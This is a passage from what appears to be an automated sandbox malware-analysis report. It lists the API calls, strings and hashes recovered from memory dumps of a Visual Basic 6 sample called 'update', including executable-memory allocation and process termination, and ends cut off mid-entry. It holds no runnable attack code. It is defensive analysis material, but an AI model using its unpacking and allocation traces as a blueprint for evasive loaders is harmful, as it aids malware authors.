                                                                                                            • __vbaStrMove.MSVBVM60(3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000), ref: 0047A2D2
                                                                                                            • __vbaStrCat.MSVBVM60(3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000), ref: 0047A2DD
                                                                                                            • __vbaStrMove.MSVBVM60(3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000), ref: 0047A2EA
                                                                                                            • __vbaStrCat.MSVBVM60(1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000), ref: 0047A2F5
                                                                                                            • __vbaStrMove.MSVBVM60(1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000), ref: 0047A302
                                                                                                            • __vbaStrCat.MSVBVM60(1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000), ref: 0047A30D
                                                                                                            • __vbaStrMove.MSVBVM60(1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000), ref: 0047A31A
                                                                                                            • __vbaStrCat.MSVBVM60(0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000), ref: 0047A325
                                                                                                            • __vbaStrMove.MSVBVM60(0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000), ref: 0047A332
                                                                                                            • __vbaStrCat.MSVBVM60(07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000), ref: 0047A33D
                                                                                                            • __vbaStrMove.MSVBVM60(07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000), ref: 0047A34A
                                                                                                            • __vbaStrCat.MSVBVM60(07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000), ref: 0047A355
                                                                                                            • __vbaStrMove.MSVBVM60(07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000), ref: 0047A362
                                                                                                            • __vbaStrCat.MSVBVM60(01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000), ref: 0047A36D
                                                                                                            • __vbaStrMove.MSVBVM60(01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000), ref: 0047A37A
                                                                                                            • __vbaStrCat.MSVBVM60(00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000), ref: 0047A385
                                                                                                            • __vbaStrMove.MSVBVM60(00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000), ref: 0047A392
                                                                                                            • __vbaStrCat.MSVBVM60(003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000), ref: 0047A39D
                                                                                                            • __vbaStrMove.MSVBVM60(003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000), ref: 0047A3AA
                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000,003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000), ref: 0047A3B5
                                                                                                            • __vbaStrMove.MSVBVM60(00000000,00000000,003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000), ref: 0047A3C2
                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000,00000000,00000000,003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000), ref: 0047A3CD
                                                                                                            • __vbaVarMove.MSVBVM60 ref: 0047A3EE
                                                                                                            • __vbaFreeStrList.MSVBVM60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047A4C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Move$Construct2$ChkstkFreeList
                                                                                                            • String ID: 00000000$0003C000$003C0000$003F0000$00FE0000$00FF0000$01FF8000$07F80000$07FFC000$0EFC0000$0FC7E000$0FF00000$0qi@$1F83E000$1F83F000$1FE00000$1FF00000$3F83F000$3FC7F000$3FE00000$3FF00000$3FFFE000$7FF00000$7FF80000$7FFC0000$7FFF0000$7FFF8000$7FFFE000$Ringgold
                                                                                                            • API String ID: 3612664920-3556444298
                                                                                                            • Opcode ID: 646b37513f125d8357db4f01b98df3dd53cddfe7662f98f9e5883d6921ed7a9e
                                                                                                            • Instruction ID: 043d8869fb7924a9ffa8075201c01d0cc86939739d25015000107c4a6852ca59
                                                                                                            • Opcode Fuzzy Hash: 646b37513f125d8357db4f01b98df3dd53cddfe7662f98f9e5883d6921ed7a9e
                                                                                                            • Instruction Fuzzy Hash: 56A20571D0021C9FDB65EB59D884BEEB7B4EB09304F5081EAE50EF6290DB785E808F59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047C831
                                                                                                            • #660.MSVBVM60(?,00004002,0000000A,00000001,00000001), ref: 0047C877
                                                                                                            • __vbaStrI2.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C893
                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C89D
                                                                                                            • #713.MSVBVM60(00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C8A3
                                                                                                            • __vbaVarCat.MSVBVM60(?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C8CA
                                                                                                            • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C8DE
                                                                                                            • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047C8E4
                                                                                                            • __vbaStrMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047C8F0
                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047C8F8
                                                                                                            • __vbaFreeVarList.MSVBVM60(00000005,0000000A,?,?,00000008,?,00000000,?,00000008,00000000,?,00000008,?,00000000,?), ref: 0047C91C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                             • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Move$Free$#660#713ChkstkList
                                                                                                            • String ID: 0G
                                                                                                            • API String ID: 3935290791-2664342302
                                                                                                            • Opcode ID: 0aa0686f79abd09be149acfbcca061a62bbebb157487eae6a51f809d2a1ac308
                                                                                                            • Instruction ID: b29a9b2e3f59e7b05f1f6244066e45640ab7f7c590b5d1677ce9beea26c87249
                                                                                                            • Opcode Fuzzy Hash: 0aa0686f79abd09be149acfbcca061a62bbebb157487eae6a51f809d2a1ac308
                                                                                                            • Instruction Fuzzy Hash: F831CCB290021CAADB11DBD5CD45FDEB7BCAB08704F1041AFB609F7191EB785A448F65

                                                                                                            Control-flow Graph

                                                                                                             [Control-flow graph rendered as an image in the report; the exported graph text is not reproduced. Entry block 7a013f-7a0163 calls 7a1180 and SetErrorMode twice, then enters the shared tail at 7a02a0, whose blocks call 7a02ad, 7a05e4, 7a0171, 7a02b9, 7a0443, 7a143d and 7a0583.]
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(00000800), ref: 007A0150
                                                                                                            • SetErrorMode.KERNELBASE(00000000), ref: 007A0158
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID: ickCount$ntdll$user32
                                                                                                            • API String ID: 2340568224-1695552900
                                                                                                            • Opcode ID: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction ID: f975af0e37841b97e1bb94d779d4da58a31fb9201bf64a909e727bb78527b11d
                                                                                                            • Opcode Fuzzy Hash: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction Fuzzy Hash: D6112731804184DFCF266A6C851A7EB2725BBD3B11F188B45F85229067EA3C6E035E9A

                                                                                                            Control-flow Graph

                                                                                                             [Control-flow graph rendered as an image in the report; the exported graph text is not reproduced. Entry block 7a018f-7a0283 calls 7a1180; block 7a0289-7a029e holds the VirtualAllocEx call and has an edge back to itself, then falls through to the same shared tail at 7a02a0 (calls 7a02ad, 7a05e4, 7a0171, 7a02b9, 7a0443, 7a143d, 7a0583) as the function at 7a013f.]
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,04000000,00003000,00000040,00000000), ref: 007A029A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Pj@h$ntdll$user32
                                                                                                            • API String ID: 4275171209-2607519978
                                                                                                            • Opcode ID: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction ID: 5547a5dd43cdf565982bdafa423866fb47db93abac6d69ebb097275410a7b013
                                                                                                            • Opcode Fuzzy Hash: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction Fuzzy Hash: 04F02720588384EDEB315B744C167AA2F509F83720F148B56A4D0990C6D93CA8075B98

                                                                                                            Control-flow Graph

                                                                                                             [Control-flow graph rendered as an image in the report; the exported graph text is not reproduced. Blocks 7a231f-7a242b and 7a2439-7a245b (the VirtualAllocEx call), then 7a3279-7a3284 calling 7a2460.]
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,?,00003000,00000004,007A075E,007A3274), ref: 007A2449
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Hrw.
                                                                                                            • API String ID: 4275171209-2486825230
                                                                                                            • Opcode ID: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction ID: 88d4295c329143be5fca5323843af3c909fe7bb5cb68c52274eb4df0efc6e2ac
                                                                                                            • Opcode Fuzzy Hash: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction Fuzzy Hash: FDE06DF28493C49FDF224F144C817C83B20BB5F355F140286EE988A1D3E2340A12CB25

Control-flow Graph (graph image not reproduced in this text export; first basic block 401384-4013a4, calls MSVBVM60 ordinal #100)
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_update.jbxd
Similarity
• API ID: #100
• String ID: VB5!6&*
• API String ID: 1341478452-3593831657
• Opcode ID: 5cebee13d27c711ce7531bc596d2c120d1e82caa7e5e7f560811fe0d957fd77b
• Instruction ID: a4405d05c6d921bf92d427b85d1f5b3976f2d93f360c910af246fde9c25d79b5
• Opcode Fuzzy Hash: 5cebee13d27c711ce7531bc596d2c120d1e82caa7e5e7f560811fe0d957fd77b
• Instruction Fuzzy Hash: 5B21661158E3E24FC71357B458665957FB09D1322071E00EBC4C1DF1E3D26C189ACBA7

Control-flow Graph (graph image not reproduced in this text export; first basic block 7a1636-7a1779, reaches TerminateProcess)
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c4ff744610ffa4ec0db8190893f91943998d0b49ea24ce80f6cec964d75e599
• Instruction ID: 18d6f369d087ecce7e1eb3edc7053c837105ec849e14c51b131f2021219b2105
• Opcode Fuzzy Hash: 5c4ff744610ffa4ec0db8190893f91943998d0b49ea24ce80f6cec964d75e599
• Instruction Fuzzy Hash: C941AD70204245EFFB29DF28CC99BDAB7A2FF8A340F508325F51D9B591C738A9508B64

Control-flow Graph (graph image not reproduced in this text export; first basic block 7a0757-7a084d, reaches TerminateProcess)
APIs
• TerminateProcess.KERNELBASE(000000FF,00000000,007A3274), ref: 007A1B40
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID: ProcessTerminate
• String ID:
• API String ID: 560597551-0
• Opcode ID: 406a286ddef4e3a109202e0a072aeabd196abeb517e3dbc35692a8f3e0fd9fb4
• Instruction ID: cf506e6e874a21cae07d59258bc43937df8ce104730d8dc253b3a9c35515a851
• Opcode Fuzzy Hash: 406a286ddef4e3a109202e0a072aeabd196abeb517e3dbc35692a8f3e0fd9fb4
• Instruction Fuzzy Hash: A4F098A180E3859FDB476B7848597583FA06F93354F160783F461DA4E3E92CCC4A8766

Control-flow Graph (graph image not reproduced in this text export; first basic block 7a1b28-7a1b37, calls TerminateProcess)
APIs
• TerminateProcess.KERNELBASE(000000FF,00000000,007A3274), ref: 007A1B40
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID: ProcessTerminate
• String ID:
• API String ID: 560597551-0
• Opcode ID: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
• Instruction ID: 1cd6c2da55158a00caece86dad8b90335dc9b298defec99c1bbe1f2a2f1a311c
• Opcode Fuzzy Hash: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
• Instruction Fuzzy Hash: 00D0C7B1744241DFC74746749C187C837D15F63275F6D0292A411CF0E1F1584D495721
Memory Dump Source
• Source File: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec97693484dce48c4a46e5ddbc8b85db1d919ab594382422590c935519ed3a1e
• Instruction ID: 5297107db6e640558cb187cfc8d5ce4b9db26268a4d803ea067a2b7477cfab88
• Opcode Fuzzy Hash: ec97693484dce48c4a46e5ddbc8b85db1d919ab594382422590c935519ed3a1e
• Instruction Fuzzy Hash: 97B012103841429AFB1062A44EC182921C092493C43640C73F401F61E0C778CE80C23D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID:
• String ID: t2z
• API String ID: 0-4045002189
• Opcode ID: cd599c19d52778a046d6c3891ce2b1f72821155114e94882081ef629cbceb089
• Instruction ID: 567d09c22aae5dd6e51df6d511297d3d48f6f1309e6693794f6d065422beaa26
• Opcode Fuzzy Hash: cd599c19d52778a046d6c3891ce2b1f72821155114e94882081ef629cbceb089
• Instruction Fuzzy Hash: AB017C71608181CFDB15DF18C0D0B297760FBAF321F21816EEA465B266E638AC43CA50
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: e3b8e84a79b10a85b8f547b7f664c7e2aeb465dfe6dca36fbef0aa5ca0ecb379
• Instruction ID: d32c7df20e1dcd3ac152874d32fe16848dcea662363ab79f5ede0684224e50ce
• Opcode Fuzzy Hash: e3b8e84a79b10a85b8f547b7f664c7e2aeb465dfe6dca36fbef0aa5ca0ecb379
• Instruction Fuzzy Hash: F35167759443818FEF25CF28C4D5726FB90EB93324F44D399D6A68E2D6C2798882C726
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af68b8877f71b6090b4145641b897d1e4f7d71ce21d0f350f00a555af201af40
• Instruction ID: 193f5952210e58d0ad0b378a28152f784ffc12560c27280903f2caa4d17e5db5
• Opcode Fuzzy Hash: af68b8877f71b6090b4145641b897d1e4f7d71ce21d0f350f00a555af201af40
• Instruction Fuzzy Hash: F2D067787852808FEB51CB98DCD0B903390AB99750FC950B4D5458BB96D19C9891D611
Memory Dump Source
• Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7a0000_update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
• Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
• Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
• Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
APIs
• __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047C988
• __vbaStrCopy.MSVBVM60(?,?,?,?,004011C6), ref: 0047C9A0
• #521.MSVBVM60(?,?,?,?,?,004011C6), ref: 0047C9A8
• __vbaStrMove.MSVBVM60(?,?,?,?,?,004011C6), ref: 0047C9B2
• #517.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 0047C9D0
• __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 0047C9DA
• __vbaCyMul.MSVBVM60(?,?,A2007B50,0000000F,?,?,?,?,?,?,?,?), ref: 0047C9EC
• #632.MSVBVM60(?,?,00000001,00000002), ref: 0047CA1C
• __vbaVarMove.MSVBVM60(?,?,00000001,00000002), ref: 0047CA2A
• __vbaFreeVar.MSVBVM60(?,?,00000001,00000002), ref: 0047CA35
• #519.MSVBVM60(?,?,?,00000001,00000002), ref: 0047CA3D
• __vbaStrMove.MSVBVM60(?,?,?,00000001,00000002), ref: 0047CA47
• #589.MSVBVM60(00000001,?,?,?,00000001,00000002), ref: 0047CA4E
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA7A
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA82
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA8A
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA92
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA9A
• __vbaFreeVar.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CAA2
• __vbaFreeVar.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CAAA
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CAB2
• __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CABA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_update.jbxd
Similarity
• API ID: __vba$Free$Move$#517#519#521#589#632ChkstkCopy
• String ID: J$P
• API String ID: 2969115251-416244054
• Opcode ID: 84ad5bbd3b495c695e980ff16cb899cdf92980267397cfa03ee8d65a1c30e817
• Instruction ID: 600c41930edbf5345b53f6e0ada458424355e7629755e05f7768d33b8ea98004
• Opcode Fuzzy Hash: 84ad5bbd3b495c695e980ff16cb899cdf92980267397cfa03ee8d65a1c30e817
• Instruction Fuzzy Hash: 2D31E871900109AADB14EBE1CD92ADDB7B5BF14708F5081BEF106B61F2DF785A09CB58
APIs
• __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047CAF0
• __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004011C6), ref: 0047CB20
• __vbaI2Var.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047CB44
• __vbaErrorOverflow.MSVBVM60(000000FF,?,?,?,?,004011C6), ref: 0047CB62
Memory Dump Source
• Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Error$ChkstkOverflow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4034433386-0
                                                                                                            • Opcode ID: 30cf5124134122de6dc8dfba6cd1d5d8f3c8a7a4a56734bc557e0a2ac1cf7d7f
                                                                                                            • Instruction ID: 7394c3622a3f878416dc302d39e75d64018f9e8212293217472152b5f63ef166
                                                                                                            • Opcode Fuzzy Hash: 30cf5124134122de6dc8dfba6cd1d5d8f3c8a7a4a56734bc557e0a2ac1cf7d7f
                                                                                                            • Instruction Fuzzy Hash: CE014C75C01248ABDB00EFD9C9497CDBBF8EB08B14F10866EE110B7290D3BD5A448BA9
                                                                                                            Strings
                                                                                                            • WM_HOOK_LOG by Chameleon Folder, xrefs: 034E6F5B
                                                                                                            • WM_SET_FOREGROUND by Chameleon Folder, xrefs: 034E6ECF
                                                                                                            • WM_PATH_DIALOG_GET by Chameleon Folder, xrefs: 034E6EEB
                                                                                                            • Folder.dll, xrefs: 034E6F93
                                                                                                            • WM_PATH_DIALOG_SET by Chameleon Folder, xrefs: 034E6F07
                                                                                                            • 0, xrefs: 034E6E49
                                                                                                            • WM_PATH_BROWSE_SET by Chameleon Folder, xrefs: 034E6F23
                                                                                                            • WM_DIALOG_YPS by Chameleon Folder, xrefs: 034E6F3F
                                                                                                            • WM_HOOK_WINDOW by Chameleon Folder, xrefs: 034E6F77
                                                                                                            • ChameleonFolderHelper, xrefs: 034E6E3F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.2942547968.0000000003461000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03461000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_3461000_ChameleonFolder.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$ChameleonFolderHelper$Folder.dll$WM_DIALOG_YPS by Chameleon Folder$WM_HOOK_LOG by Chameleon Folder$WM_HOOK_WINDOW by Chameleon Folder$WM_PATH_BROWSE_SET by Chameleon Folder$WM_PATH_DIALOG_GET by Chameleon Folder$WM_PATH_DIALOG_SET by Chameleon Folder$WM_SET_FOREGROUND by Chameleon Folder
                                                                                                            • API String ID: 0-665509755
                                                                                                            • Opcode ID: 9ffa8f6840436782e90293cc4e9ef60cd837807f8c50a00da7ed89d8e997bbcd
